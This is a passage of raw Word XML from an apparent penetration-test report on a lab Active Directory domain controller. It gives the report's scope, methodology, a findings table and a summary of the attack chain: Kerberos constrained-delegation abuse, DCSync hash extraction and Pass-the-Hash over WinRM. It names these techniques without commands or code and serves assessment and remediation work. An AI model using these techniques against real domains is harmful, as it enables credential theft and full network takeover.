        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password-reset</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> account was configured with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kerberos Constrained Delegation with Protocol Transition</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>TRUSTED_TO_AUTH_FOR_DELEGATION</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>). The assessor abused the S4U2Self / S4U2Proxy extensions to forge a Kerberos service ticket impersonating the Domain Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">With Domain Administrator privileges, the assessor performed a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> attack to extract the NTDS.dit hashes and used Pass-the-Hash over WinRM to obtain an interactive administrative shell on the Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc234251532"/>
      <w:r>
        <w:rPr/>
        <w:t>Business Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Full domain compromise represents the most severe outcome of an internal assessment. An attacker in this position can read, modify, or destroy any data in the environment; create persistent backdoor accounts; disable security controls; and deploy ransomware domain-wide. Because every credential in the directory was recovered, remediation requires more than patching a single host - it requires credential rotation and correction of the underlying AD misconfigurations described in this report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc234251533"/>
      <w:r>
        <w:rPr/>
        <w:t>Key Findings at a Glance</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1680"/>
        <w:gridCol w:w="5905"/>
        <w:gridCol w:w="1775"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680"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jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5905"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Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1775"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="7A1620" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>CRITICAL</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5905"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Kerberos Constrained Delegation Abuse leading to Domain Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1775"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AD Misconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B0341D" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>HIGH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5905"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Plaintext Credentials Exposed on RDP Login Screen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1775"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Info Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B0341D" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>HIGH</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5905"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Kerberoastable Service Account with Weak Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1775"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Weak Policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:start w:w="90" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:end w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblW w:w="1500" w:type="dxa"/>
              <w:jc w:val="start"/>
              <w:tblInd w:w="0" w:type="dxa"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblCellMar>
                <w:top w:w="40" w:type="dxa"/>
                <w:start w:w="80" w:type="dxa"/>
                <w:bottom w:w="40" w:type="dxa"/>
                <w:end w:w="80" w:type="dxa"/>
              </w:tblCellMar>
              <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1500"/>
            </w:tblGrid>
            <w:tr>
              <w:trPr/>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="1500" w:type="dxa"/>
                  <w:tcBorders/>
                  <w:shd w:color="auto" w:fill="B8860B" w:val="clear"/>
                </w:tcPr>
                <w:p>
                  <w:pPr>
                    <w:pStyle w:val="Normal"/>
                    <w:jc w:val="center"/>
                    <w:rPr/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:b/>
                      <w:bCs/>
                      <w:color w:val="FFFFFF"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>MODERATE</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5905"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Sensitive Information Disclosure via Web Backup File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1775"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Info Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="14" w:space="6" w:color="1F2A44"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc234251534"/>
      <w:r>
        <w:rPr/>
        <w:t>2. Assessment Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc234251535"/>
      <w:r>
        <w:rPr/>
        <w:t>2.1 Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The assessment was scoped to a single target host operating as the Active Directory Domain Controller for the COOCTUS.CORP domain.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="70" w:type="dxa"/>
          <w:start w:w="110" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:end w:w="110" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:noHBand="0" w:noVBand="0" w:firstColumn="0" w:lastRow="0" w:lastColumn="0" w:firstRow="0" w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2999"/>
        <w:gridCol w:w="6361"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In-Scope Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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10.64.148.30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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DC.COOCTUS.CORP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Domain / Realm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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COOCTUS.CORP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Testing Window</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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Single engagement session, 2026-07-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:start w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
              <w:end w:val="single" w:sz="4" w:space="0" w:color="C7CEDA"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="EEF1F5" w:val="clear"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:lineRule="auto" w:line="250" w:before="0" w:after="20"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F2A44"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Rules of Engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="63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Full exploitation permitted; no destructive actions or persistence left in place.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc234251536"/>
      <w:r>
        <w:rPr/>
        <w:t>2.2 Objectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Identify network-facing services and misconfigurations on the Domain Controller.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Establish an initial foothold and enumerate the Active Directory environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Demonstrate privilege escalation and lateral movement paths to Domain Administrator.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Quantify the business impact of a full domain compromise and provide actionable remediation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc234251537"/>
      <w:r>
        <w:rPr/>
        <w:t>2.3 Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Testing followed a standard penetration-testing lifecycle aligned with the PTES / TCM Security PNPT methodology:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information Gathering - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>port and service enumeration, web content discovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Enumeration &amp; Foothold - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credential discovery, SMB/LDAP enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Kerberoasting and offline password cracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege Escalation - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>delegation abuse and impersonation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="264" w:before="0" w:after="70"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Domain Dominance - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DCSync, Pass-the-Hash, and objective capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="200" w:after="90"/>
        <w:rPr/>
      </w:pPr>
